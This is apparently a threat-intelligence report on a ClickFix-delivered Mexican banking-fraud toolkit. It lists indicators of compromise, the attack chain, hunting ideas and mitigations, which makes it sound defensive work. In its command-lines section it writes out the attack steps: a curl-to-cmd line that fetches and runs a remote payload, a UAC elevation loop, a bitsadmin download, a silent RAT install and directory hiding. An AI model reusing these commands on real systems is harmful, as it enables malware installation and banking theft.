ClickFix to Cash-Out: Anatomy of a Mexican Banking-Fraud Toolkit
REF6045 is an operator-assisted Mexican banking fraud operation that uses ClickFix fake CAPTCHA pages to deliver the SCMBANKER PowerShell toolkit. Once installed, the toolkit monitors for banking sessions, captures screenshots, deploys vishing overlays, hijacks clipboard data to swap CLABE and card numbers, redirects browsers to phishing pages, and silently installs Remote Utilities as a persistent RAT. The operation's infrastructure suffered significant OPSEC failures including open directories, a leaked web-root archive, and an unauthenticated configuration editor.
- domainbancaporinternetbbmx[.]onlineBanBajio phishing redirect destination page that sends victim device profile to operator via Telegram notification
- domaingestionmontelavaria2026[.]onlineC2 domain for the monteviral2026 variant, receiving beacon data at /dashboard2/recData.php
- domainmonteviral2026[.]duckdns[.]orgClickFix host and file server variant hosting SCMBANKER toolkit under /files/
- domainnegratomasa2026[.]onlinePrimary C2 domain hosting beacon endpoint, banking config files, screenshot upload, keylogger exfil, and clipboard replacement data
- domainosogransd[.]onlineClickFix host and file server variant hosting SCMBANKER toolkit under /files/
- domainratonvaquero2026[.]onlineClickFix host and file server hosting SCMBANKER toolkit scripts under /files/ directory
- domainssinvestigaciones[.]comTracking endpoint receiving POST requests after victim completes fake CAPTCHA verification on ClickFix pages
- ip185[.]242[.]246[.]169C2 server receiving beacon data and banking activity alerts from infected hosts via /dashboard2/recData.php
- ip216[.]250[.]112[.]100Secondary ClickFix and file host serving validation.txt for the osogransd.online variant
- ip68[.]211[.]161[.]46Primary ClickFix delivery and file host serving validation.txt and /files/ open directory containing SCMBANKER toolkit scripts
- sha2560315d4a7bc14654ad66d4c2b98920b92ca18cbc231b3ce5fba1fcac70b828e19mensajeoff.ps1 — soft-lock vishing overlay that resists dismissal, resizing, or minimization
- sha2560ec9b518f84b6bdc0e843b89fa755522ec67db862414ad16bdcaa8c2be25485cedifhjwe.ps1 — self-updater module that downloads ZIP, wipes toolkit directory, and extracts new version
- sha25613bfd0f695cea1d6ae570a7ca056ffe930467be73a26f29f95209618f383bd2d4.bat — early version of run.vbs master launcher
- sha25626f906a2a4276b1968a8ce956a7b342aa9bc26f60d32c14668223877f569fb3frotor.ps1 — keylogger rotator applying mutation pattern to key.ps1
- sha25630ff24faad80184bb43660a8bd317df99a8d09d31bae3b446aaa876543f2620fkey.ps1 — keylogger module using Win32 API calls with Base64-encoded names; exfiltrates to C2
- sha25632d981b3e7c36aa7030cfd9ee412bff742e00b36c39c80634b2681f89de4a487hosts.msi — Remote Utilities Host installer silently deployed via msiexec
- sha256345e8a90b7b762b065333cd068811d88086d157be713d89bdf200c927645f3d8remo.ps1 — IP-gated launcher for jujuzkt2.ps1 phishing redirect module
- sha2563d9015429d65276869ceb9c91f10d6474b1098042db75949c49b9f1682c1f3aeremoto.ps1 — Remote Utilities configurator importing registry blob for auto-connect callback to operator
- sha2564b7b35b921d7615b7a82a42c379560d1b0c5a74c81311a269874195ba2744f2dcursor2.exe — compiled AutoIt invisible-cursor utility replacing all system cursors with invisible cursor file
- sha2564d9c160ebb44507b11f0e6421f691900284f25b5530a23d9fd50de0ae01663camensaje.ps1 — hard-lock vishing overlay creating borderless topmost WebBrowser window with mouse confinement
- sha256526287a40aad1b218228cdd1f459ad3b93f858585048347644d597c6ab19515aSHA-256 of cliente.ps1, the C2 beacon script that POSTs machine profile data every 30 seconds and receives operator commands
- sha256554f1aefeb698995501751328c2f9fe93f02a680679fba3dd15f1ed93d46bf1bSHA-256 of validation.txt, the first-stage batch payload fetched by ClickFix and piped directly into cmd.exe
- sha256566f4bfdfea54129b8528d50cae187a9030e2f2787749add4b0db22ac35ea581screen2.ps1 — screenshot capture module compressing and uploading full virtual desktop to C2
- sha2565bc85b604eb37ffa1e67c57f4744b55ef876a1ab442e2a2440550ef0922aeec7correr.ps1 — arbitrary PowerShell executor that runs commands received from C2 comando.txt
- sha2565d17645548a44fe39d3cc816ffa3933321c1eb8b08a8f4348e3cd82f25112c81rotor1.ps1 — screenshot module rotator spawning screen2.ps1 every 7 seconds for 5 minutes per banking trigger
- sha256685d29ce8a550feb3a9e1d1c5926ec5e927615cf34aab62c108a812a1eb6737cjujuzkt.ps1 — banking activity monitor that scans window titles for bank names and triggers screenshot/alert workflow
- sha2566c8ba7127a83431432e85946976c18bb3f3e9bf9def68aae572cd1d9d73604c7avs.ps1 — Remote Utilities RAT downloader that polls for MSI URLs from C2 command file
- sha2566dcd7fdd5e088d98d861cbd1cb74a7b83ae5508f4dbb617413bcbe7fbc8a82e2mensaje1.ps1 — vishing dispatcher that maps victim public IPs to vishing lock-screen pages
- sha25670140aa236d630a7d5ed08be3dafcccea9a8b0eec6dadf8c1cf1b96d8f608609clip2.ps1 — card-number clipboard hijacker targeting 16-digit numbers matched by BIN prefix
- sha25681a4512db985359ed361755da58a1177b07632b5aee951c68a6ace54f4d0534binstaler.ps1 — Remote Utilities installer launcher using msiexec silent install with RunAs elevation loop
- sha256882d582e85d5bb7abbdde791a2d52e3b1bb7dd7f79c20318ce64b74249221fdbrotor2.ps1 — vishing dispatcher rotator keeping mensaje1.ps1 alive under changing filenames
- sha2568c87ea94401fa97d3743a87604e088d1a29c7b06cf9673623941a42da68452a6jujuzkt2.ps1 — active browser redirect module that injects phishing URLs via clipboard and simulated keystrokes
- sha256b30cb0aa977aacdab94d2ef503186c8f0b2fc10d7cf0d7c7c0ada70c127dc7e8SHA-256 of zkt.zip, the exposed web-root archive containing the operation's full tooling and targeting logic
- sha256cd7b179dd98848a02b9a1d4ebfeee26cdbb317b4ad53eb50786e18515b0cf804ini.ps1 — delayed launcher for jujuzkt.ps1 banking activity monitor
- sha256eea08fbf3720d638af1d313d3ce369708b77d7891379d5c5871dd7f36667ed0cclip.ps1 — CLABE clipboard hijacker checking every 300ms for 18-digit Mexican bank account numbers
- sha256ff3555154e91e42490cc722b6c7f3c4c91654b7ef53a35d0719ffb89accf1b27SHA-256 of run.vbs, the master launcher that starts all SCMBANKER modules in parallel via hidden PowerShell
- urlhxxp://68[.]211[.]161[.]46/driver[.]html?offVishing lock-screen page that links victims to Remote Utilities payload download
- urlhxxp://68[.]211[.]161[.]46/files/Open directory hosting all SCMBANKER PowerShell scripts and binaries for direct download
- urlhxxp://68[.]211[.]161[.]46/validation[.]txtFirst-stage batch script fetched by ClickFix pages and piped into cmd.exe
- urlhxxps://negratomasa2026[.]online/b/clabes[.]txtRemote file containing attacker-controlled CLABE account numbers for clipboard replacement
- urlhxxps://negratomasa2026[.]online/b/editor[.]phpUnauthenticated file editor on C2 allowing anyone to read and modify live targeting configuration
- urlhxxps://negratomasa2026[.]online/b/tarjetas[.]txtRemote file containing attacker-controlled card numbers for clipboard replacement
- urlhxxps://negratomasa2026[.]online/dashboard2/avisos2[.]phpBanking activity alert endpoint receiving POST when victim opens a matched banking window title
- urlhxxps://negratomasa2026[.]online/dashboard2/imagenes[.]phpScreenshot upload endpoint receiving compressed full-desktop captures during banking sessions
- urlhxxps://negratomasa2026[.]online/dashboard2/logs[.]phpKeylogger exfiltration endpoint receiving client ID and hostname data
- urlhxxps://negratomasa2026[.]online/dashboard2/recData[.]phpC2 beacon endpoint receiving machine profile, IP, hostname, and command polling data every 30 seconds
- urlhxxps://ww[.]ssinvestigaciones[.]com/login3[.]phpTracking endpoint receiving POST after victim completes fake CAPTCHA on ClickFix page
Detection / Hunteropenrouter
What Happened
A criminal group is targeting people in Mexico who use online banking by tricking them with fake website verification pages. The fake pages look like standard CAPTCHA security checks but actually install a set of malicious programs that let the criminals watch what the victim does on their computer. When the victim opens a banking website, the criminals can lock the screen with a fake warning message, redirect the victim to a fake banking page, or secretly swap bank account numbers that the victim copies to paste elsewhere — so money gets sent to the criminal's account instead. The criminals can also install remote control software to take over the computer entirely. People who bank online in Mexico are the primary targets. This matters because the criminals are actively using these tools against real victims and can steal money directly from bank accounts. People should be very cautious of any website asking them to copy and paste commands into their computer, and organizations should block the known malicious domains and IP addresses listed in this report.
Key Takeaways
- REF6045 is an operator-assisted Mexican banking fraud campaign using ClickFix fake CAPTCHA pages to deliver the SCMBANKER PowerShell toolkit
- SCMBANKER provides a full fraud workflow: banking-session monitoring, screenshot capture, vishing overlays, browser redirects, CLABE/card clipboard hijacking, and silent Remote Utilities RAT deployment
- The toolkit heavily targets Mexico's financial ecosystem including retail banks, fintechs, payment processors, crypto exchanges, SAT, and telecom services
- Operator OPSEC failures exposed open directories, a leaked web-root archive (zkt.zip), and an unauthenticated file editor at /b/editor.php
- Scripts contain strong AI-generation artifacts suggesting the operator used an LLM to write most of the tooling, lowering the barrier to entry for sophisticated fraud capabilities
Affected Systems
- Microsoft Windows endpoints (general user workstations)
- Microsoft Edge browser (used in kiosk mode for fake update smokescreen)
- Mexican banking customers (retail banks, business banking, fintechs, payment processors, crypto exchanges, investment platforms, SAT, telecom)
Vulnerabilities (CVEs)
None identified.
Attack Chain
- Initial Access: Victim visits fake CAPTCHA verification page (ClickFix) that copies a curl-to-cmd command to clipboard instructing victim to paste into Windows Run dialog
- Execution: validation.txt batch script launches Edge kiosk mode to fakeupdate.net as distraction, enforces UAC elevation loop, locks cursor via ClipCursor API, and downloads SCMBANKER toolkit via bitsadmin to C:\Users\Public\
- Persistence: Script drops run.vbs to startup folder and sets HKCU Run key, then forces reboot via shutdown /r /t 02 to trigger persistence on next logon
- Discovery & Collection: cliente.ps1 beacons machine profile to C2 every 30 seconds; jujuzkt.ps1 monitors window titles for banking keywords every second and triggers screenshot capture when matches found
- Fraud Execution: Operator selectively activates vishing overlays (mensaje.ps1/mensajeoff.ps1), browser redirects to phishing pages (jujuzkt2.ps1), and clipboard hijacking for CLABE/card numbers (clip.ps1/clip2.ps1) based on victim public IP
- Remote Access: Operator pushes Remote Utilities MSI via C2; instaler.ps1 silently installs RAT, remoto.ps1 configures auto-connect callback, and removes uninstall string to prevent removal
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: Elastic Security Labs (behavioral prevention rules on GitHub)
Elastic Security Labs has published 9 behavioral prevention rules on their GitHub protections-artifacts repository targeting various stages of the SCMBANKER attack chain, including suspicious PowerShell execution via Windows scripts, suspicious bitsadmin activity, curl piped to cmd, and execution from unusual directories.
Detection Engineering Assessment
| Dimension | Rating | Rationale |
|---|---|---|
| EDR Visibility | High | The toolkit relies heavily on PowerShell script execution, bitsadmin downloads, VBScript launchers, msiexec silent installs, and registry modifications — all of which are well-covered by standard EDR telemetry. Process creation, command-line logging, and file write events would capture most stages. |
| Network Visibility | High | C2 communication uses HTTP POST to specific PHP endpoints on known domains, and the toolkit fetches configuration files over HTTPS from predictable URL paths. DNS queries to the C2 domains and HTTP connections to the file servers would be visible at the network perimeter. |
| Detection Difficulty | Moderate | The toolkit uses legitimate tools (bitsadmin, PowerShell, msiexec, curl) and masquerades script copies under Windows-like filenames in TEMP. However, the behavioral patterns — curl piped to cmd, bitsadmin downloading to C:\Users\Public, PowerShell launched from VBS, clipboard monitoring loops, and the specific C2 domains — provide multiple high-fidelity detection opportunities. |
Required Log Sources
- Windows Security Event ID 4688 (Process Creation) with command-line logging
- Windows Sysmon Event ID 1 (Process Create), 11 (FileCreate), 13 (RegistryValueSet)
- PowerShell Script Block Logging (Event ID 4104)
- DNS query logs
- HTTP/HTTPS proxy logs with URL inspection
- BITS service logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for processes that pipe curl output directly into cmd.exe or powershell.exe, as this is a hallmark of ClickFix-style delivery and is uncommon in legitimate administrative workflows. | Process creation events with command-line arguments (Sysmon EID 1, Windows EID 4688) | Initial Access / Execution | Low — legitimate use of curl piped to shell is rare in enterprise environments |
| Consider hunting for bitsadmin jobs downloading files to C:\Users\Public, which is an unusual destination directory for legitimate software updates or transfers. | Process creation events for bitsadmin.exe with command-line arguments, BITS service logs | Ingress Tool Transfer | Low — bitsadmin usage itself is increasingly rare in modern environments and downloads to Public are atypical |
| Consider hunting for VBScript files (.vbs) launching hidden PowerShell processes, particularly from startup folder paths or triggered by registry Run key values. | Process creation events showing wscript.exe/cscript.exe spawning powershell.exe with hidden window style, registry Run key modifications | Persistence / Execution | Medium — some legitimate administrative scripts use this pattern, so correlation with startup folder or Run key is important |
| Consider hunting for PowerShell processes that repeatedly enumerate visible window titles (T1010) and make HTTP POST requests, as this indicates the banking activity monitoring behavior. | PowerShell script block logs (EID 4104), network connection events from powershell.exe | Discovery / Collection | Medium — window enumeration via PowerShell is uncommon but could appear in legitimate automation scripts |
| Consider hunting for msiexec silent installs (msiexec /i /quiet /norestart) followed by registry modifications to HKLM\SOFTWARE\Usoris, indicating Remote Utilities RAT configuration. | Process creation for msiexec.exe, registry modification events (Sysmon EID 13) | Persistence / Command and Control | Low — the combination of silent msiexec with Usoris registry keys is highly specific to this RAT |
Control Gaps
- Network-level blocking alone would not prevent execution since the toolkit uses legitimate Windows tools (bitsadmin, PowerShell, msiexec) and HTTPS for some communications
- Application whitelisting that permits PowerShell and VBScript by default would not prevent the toolkit from executing
- Standard anti-malware signatures may miss the toolkit due to the rotator pattern that copies scripts to TEMP under changing Windows-like filenames
- UAC prompts would not prevent infection since the script uses a social-engineering fatigue loop to force the victim to click Yes
- Clipboard monitoring by security tools is typically not enabled, allowing CLABE and card number replacement to occur silently
Key Behavioral Indicators
- curl or wget output piped directly into cmd.exe or powershell.exe from Windows Run dialog
- bitsadmin.exe downloading multiple files to C:\Users\Public\ directory
- wscript.exe launching powershell.exe with -WindowStyle Hidden from a .vbs file in startup folder or C:\Users\Public\
- PowerShell process making repeated HTTP POST requests to PHP endpoints on suspicious domains every 30 seconds
- msiexec.exe executing with /quiet /norestart flags from C:\Users\Public\ followed by registry writes to HKLM\SOFTWARE\Usoris
- PowerShell processes with names matching Windows system binaries running from %TEMP% directory (rotator masquerading pattern)
- attrib.exe setting +h +s on C:\Users\Public directory
- shutdown.exe /r /t 02 executed shortly after script execution and file downloads
- Registry Run key value named 'run' launching hidden PowerShell
- Multiple PowerShell processes spawned in parallel from a single VBScript launcher
False Positive Assessment
Low — the combination of bitsadmin downloads to C:\Users\Public, curl piped to cmd, VBScript launching hidden PowerShell, and communication with the identified C2 domains provides high-fidelity detection opportunities with minimal legitimate use cases in enterprise environments.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting. Consider blocking the identified C2 IPs (68.211.161.46, 216.250.112.100, 185.242.246.169) and domains (negratomasa2026.online, ratonvaquero2026.online, monteviral2026.duckdns.org, osogransd.online, gestionmontelavaria2026.online, ssinvestigaciones.com, bancaporinternetbbmx.online) at your firewall, proxy, and DNS filtering layers.
- Consider searching endpoint telemetry for the SHA-256 hashes of known SCMBANKER components (validation.txt, run.vbs, cliente.ps1, jujuzkt.ps1) to identify potentially compromised hosts.
- If your EDR supports host isolation, consider isolating any hosts found communicating with the identified C2 endpoints or with files matching the known hashes.
- Consider hunting for bitsadmin downloads to C:\Users\Public\ and PowerShell processes launched from VBScript files in startup folders.
Infrastructure Hardening
- Evaluate whether your DNS filtering or Secure Web Gateway can block requests to .online domains with suspicious subdomain patterns matching the campaign naming convention (e.g., *2026.online).
- Consider implementing network-level blocking for the specific C2 URL paths (/dashboard2/recData.php, /dashboard2/avisos2.php, /dashboard2/imagenes.php) if your proxy supports URL-based policies.
- If applicable to your environment, consider restricting outbound BITS transfer traffic or monitoring BITS job creation events on endpoints.
- Evaluate whether Remote Utilities Host should be explicitly blocked or application-controlled in your environment, as it is being abused as a RAT in this campaign.
User Protection
- Consider deploying the Elastic behavioral prevention rules referenced in the article if you use Elastic Security as your endpoint protection platform.
- If your EDR supports it, consider enabling or tuning detections for curl output piped to cmd.exe, which is a key ClickFix delivery indicator.
- Consider enabling PowerShell Script Block Logging (Event ID 4104) if not already active, as it would capture the full content of SCMBANKER's PowerShell modules.
- Evaluate whether your endpoint solution can detect and alert on clipboard monitoring behavior, particularly rapid polling loops targeting numeric patterns.
Security Awareness
- Consider incorporating ClickFix social engineering warnings into existing awareness programs — emphasize that legitimate websites will never ask users to copy and paste commands into Windows Run dialog or terminal.
- If your organization serves Mexican banking customers or has employees using Mexican financial services, consider targeted awareness communications about this specific campaign.
- Consider reminding users to verify the authenticity of any unexpected 'verification' or 'CAPTCHA' pages, particularly those that instruct them to run commands on their computer.
- Where supported by your awareness program, consider educating users about the risk of pasting unknown content from websites, as ClickFix abuses the clipboard API to deliver malicious commands.
MITRE ATT&CK Mapping
Initial Access
Persistence
Stealth
Defense Impairment
Credential Access
Discovery
Collection
Command and Control
Exfiltration
Impact
Additional IOCs
- Ips:
216[.]250[.]112[.]100- Secondary ClickFix and file host serving validation.txt for the osogransd.online variant
- Domains:
monteviral2026[.]duckdns[.]org- ClickFix host and file server variant hosting SCMBANKER toolkit under /files/osogransd[.]online- ClickFix host and file server variant hosting SCMBANKER toolkit under /files/gestionmontelavaria2026[.]online- C2 domain for the monteviral2026 variant, receiving beacon data at /dashboard2/recData.php
- Urls:
hxxp://68[.]211[.]161[.]46/files/- Open directory hosting all SCMBANKER PowerShell scripts and binaries for direct downloadhxxp://68[.]211[.]161[.]46/validation.txt- First-stage batch script fetched by ClickFix pages and piped into cmd.exehxxps://negratomasa2026[.]online/dashboard2/recData.php- C2 beacon endpoint receiving machine profile, IP, hostname, and command polling data every 30 secondshxxps://negratomasa2026[.]online/dashboard2/avisos2.php- Banking activity alert endpoint receiving POST when victim opens a matched banking window titlehxxps://negratomasa2026[.]online/dashboard2/imagenes.php- Screenshot upload endpoint receiving compressed full-desktop captures during banking sessionshxxps://negratomasa2026[.]online/dashboard2/logs.php- Keylogger exfiltration endpoint receiving client ID and hostname datahxxps://negratomasa2026[.]online/b/clabes.txt- Remote file containing attacker-controlled CLABE account numbers for clipboard replacementhxxps://negratomasa2026[.]online/b/tarjetas.txt- Remote file containing attacker-controlled card numbers for clipboard replacementhxxps://negratomasa2026[.]online/b/editor.php- Unauthenticated file editor on C2 allowing anyone to read and modify live targeting configurationhxxps://ww[.]ssinvestigaciones[.]com/login3.php- Tracking endpoint receiving POST after victim completes fake CAPTCHA on ClickFix pagehxxp://68[.]211[.]161[.]46/driver.html?off- Vishing lock-screen page that links victims to Remote Utilities payload download
- File Hashes:
685d29ce8a550feb3a9e1d1c5926ec5e927615cf34aab62c108a812a1eb6737c(SHA256) - jujuzkt.ps1 — banking activity monitor that scans window titles for bank names and triggers screenshot/alert workflow8c87ea94401fa97d3743a87604e088d1a29c7b06cf9673623941a42da68452a6(SHA256) - jujuzkt2.ps1 — active browser redirect module that injects phishing URLs via clipboard and simulated keystrokes6dcd7fdd5e088d98d861cbd1cb74a7b83ae5508f4dbb617413bcbe7fbc8a82e2(SHA256) - mensaje1.ps1 — vishing dispatcher that maps victim public IPs to vishing lock-screen pages4d9c160ebb44507b11f0e6421f691900284f25b5530a23d9fd50de0ae01663ca(SHA256) - mensaje.ps1 — hard-lock vishing overlay creating borderless topmost WebBrowser window with mouse confinement0315d4a7bc14654ad66d4c2b98920b92ca18cbc231b3ce5fba1fcac70b828e19(SHA256) - mensajeoff.ps1 — soft-lock vishing overlay that resists dismissal, resizing, or minimizationeea08fbf3720d638af1d313d3ce369708b77d7891379d5c5871dd7f36667ed0c(SHA256) - clip.ps1 — CLABE clipboard hijacker checking every 300ms for 18-digit Mexican bank account numbers70140aa236d630a7d5ed08be3dafcccea9a8b0eec6dadf8c1cf1b96d8f608609(SHA256) - clip2.ps1 — card-number clipboard hijacker targeting 16-digit numbers matched by BIN prefix6c8ba7127a83431432e85946976c18bb3f3e9bf9def68aae572cd1d9d73604c7(SHA256) - avs.ps1 — Remote Utilities RAT downloader that polls for MSI URLs from C2 command file81a4512db985359ed361755da58a1177b07632b5aee951c68a6ace54f4d0534b(SHA256) - instaler.ps1 — Remote Utilities installer launcher using msiexec silent install with RunAs elevation loop3d9015429d65276869ceb9c91f10d6474b1098042db75949c49b9f1682c1f3ae(SHA256) - remoto.ps1 — Remote Utilities configurator importing registry blob for auto-connect callback to operator30ff24faad80184bb43660a8bd317df99a8d09d31bae3b446aaa876543f2620f(SHA256) - key.ps1 — keylogger module using Win32 API calls with Base64-encoded names; exfiltrates to C24b7b35b921d7615b7a82a42c379560d1b0c5a74c81311a269874195ba2744f2d(SHA256) - cursor2.exe — compiled AutoIt invisible-cursor utility replacing all system cursors with invisible cursor file32d981b3e7c36aa7030cfd9ee412bff742e00b36c39c80634b2681f89de4a487(SHA256) - hosts.msi — Remote Utilities Host installer silently deployed via msiexec5d17645548a44fe39d3cc816ffa3933321c1eb8b08a8f4348e3cd82f25112c81(SHA256) - rotor1.ps1 — screenshot module rotator spawning screen2.ps1 every 7 seconds for 5 minutes per banking trigger566f4bfdfea54129b8528d50cae187a9030e2f2787749add4b0db22ac35ea581(SHA256) - screen2.ps1 — screenshot capture module compressing and uploading full virtual desktop to C2882d582e85d5bb7abbdde791a2d52e3b1bb7dd7f79c20318ce64b74249221fdb(SHA256) - rotor2.ps1 — vishing dispatcher rotator keeping mensaje1.ps1 alive under changing filenames5bc85b604eb37ffa1e67c57f4744b55ef876a1ab442e2a2440550ef0922aeec7(SHA256) - correr.ps1 — arbitrary PowerShell executor that runs commands received from C2 comando.txt0ec9b518f84b6bdc0e843b89fa755522ec67db862414ad16bdcaa8c2be25485c(SHA256) - edifhjwe.ps1 — self-updater module that downloads ZIP, wipes toolkit directory, and extracts new versioncd7b179dd98848a02b9a1d4ebfeee26cdbb317b4ad53eb50786e18515b0cf804(SHA256) - ini.ps1 — delayed launcher for jujuzkt.ps1 banking activity monitor345e8a90b7b762b065333cd068811d88086d157be713d89bdf200c927645f3d8(SHA256) - remo.ps1 — IP-gated launcher for jujuzkt2.ps1 phishing redirect module26f906a2a4276b1968a8ce956a7b342aa9bc26f60d32c14668223877f569fb3f(SHA256) - rotor.ps1 — keylogger rotator applying mutation pattern to key.ps113bfd0f695cea1d6ae570a7ca056ffe930467be73a26f29f95209618f383bd2d(SHA256) - 4.bat — early version of run.vbs master launcher
- Registry Keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run- Persistence Run key with value 'run' launching hidden PowerShell executing run.vbs on logonHKLM\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters- Registry blob imported by remoto.ps1 to configure Remote Utilities auto-connect callback to operator on port 5650HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6688BD5-2126-4F4F-A484-1D05781479B9}- UninstallString deleted by remoto.ps1 to prevent victim from removing Remote Utilities via Add/Remove ProgramsHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce- RunOnce key with value 'id' writing infection timestamp to C:\Users\Public\id.txt on next logon then self-deleting
- File Paths:
C:\Users\Public\run.vbs- Master launcher VBScript dropped by initial payload; starts all SCMBANKER modules in parallelC:\Users\Public\cliente.ps1- C2 beacon script collecting machine profile and POSTing to C2 every 30 secondsC:\Users\Public\comando.txt- Command file written by C2 response and polled by other modules for operator instructionsC:\Users\Public\agent.txt- RAT installation status file; contains 'SIN REMOTO AUN' or 'REMOTO INSTALADO'C:\Users\Public\99.kut- Guard file preventing reinstallation of Remote Utilities RATC:\Users\Public\id.txt- Infection timestamp file written once on next logon via RunOnce keyC:\Users\Public\invi.cur- Invisible cursor file used by cursor2.exe to replace all system cursorsC:\Users\Public\key.ps1- Keylogger script using Win32 API calls with Base64-encoded names%TEMP%\Agent_temp.zip- Temporary ZIP downloaded by self-updater module containing new toolkit version
- Command Lines:
- Purpose: Download and execute first-stage batch payload from ClickFix page | Tools:
curl,cmd.exe| Stage: Initial Access |cmd /c curl -k http://<host>/validation.txt | cmd.exe - Purpose: Launch Microsoft Edge in kiosk mode pointing to fake Windows Update screen as distraction | Tools:
msedge.exe| Stage: Execution - Purpose: UAC consent fatigue loop relaunching script with elevation until victim clicks Yes | Tools:
powershell,net session| Stage: Privilege Escalation |powershell -Command "Start-Process '%~f0' -Verb RunAs" - Purpose: Download SCMBANKER toolkit scripts and binaries from open directory | Tools:
bitsadmin| Stage: Ingress Tool Transfer |bitsadmin /transfer <jobname> http://<host>/files/<file> C:\Users\Public\ - Purpose: Force system reboot to trigger persistence mechanisms | Tools:
shutdown| Stage: Impact |shutdown /r /t 02 - Purpose: Silently install Remote Utilities RAT via msiexec | Tools:
msiexec| Stage: Persistence |msiexec /i "hosts.msi" /quiet /norestart - Purpose: Hide the implant directory to prevent casual discovery | Tools:
attrib| Stage: Defense Evasion |attrib +h +s "C:\Users\Public"
- Purpose: Download and execute first-stage batch payload from ClickFix page | Tools:
- Other:
46053.045416157- Remote Utilities SID hardcoded in registry configuration for operator callback auto-connect